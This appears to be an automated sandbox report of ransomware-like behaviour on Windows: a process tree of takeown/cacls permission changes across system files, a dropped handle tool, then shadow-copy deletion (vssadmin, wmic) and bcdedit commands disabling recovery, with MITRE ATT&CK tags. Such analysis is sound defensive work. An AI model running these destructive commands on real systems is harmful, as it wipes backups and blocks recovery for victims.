C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:5948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:6016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:5428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "overlay.png" -nobanner3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "overlay.png" -nobanner4⤵PID:5224
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C3⤵PID:5488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"3⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "utc.tracing.json" -nobanner3⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "utc.tracing.json" -nobanner4⤵PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:2480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:5924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:5536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:5316
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:6128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:5340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵PID:5756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "WinMail.exe" -nobanner3⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "WinMail.exe" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:6060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:5652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:5912
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:5748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "superbar.png" -nobanner3⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "superbar.png" -nobanner4⤵PID:5408
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dQ2Xvi4l.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:5640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:2472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵
- Modifies file permissions
PID:5280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dgFQYQPu.exe -accepteula "edb.chk" -nobanner3⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula "edb.chk" -nobanner4⤵PID:5740
-
-
-
C:\Users\Admin\AppData\Local\Temp\dgFQYQPu.exedgFQYQPu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5396
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\mLqKlmID.bat"1⤵PID:4752
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:948
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4136
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4852
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3764
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1656
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3